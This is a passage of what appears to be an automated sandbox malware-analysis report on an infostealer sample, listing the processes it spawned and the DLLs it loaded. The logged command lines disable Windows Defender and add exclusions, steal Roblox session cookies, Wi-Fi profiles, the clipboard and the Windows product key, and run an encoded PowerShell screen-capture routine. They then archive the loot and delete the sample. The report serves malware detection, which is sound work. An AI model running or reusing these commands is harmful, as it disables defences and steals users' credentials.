QApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\getmac.exe getmac
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: libssl-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
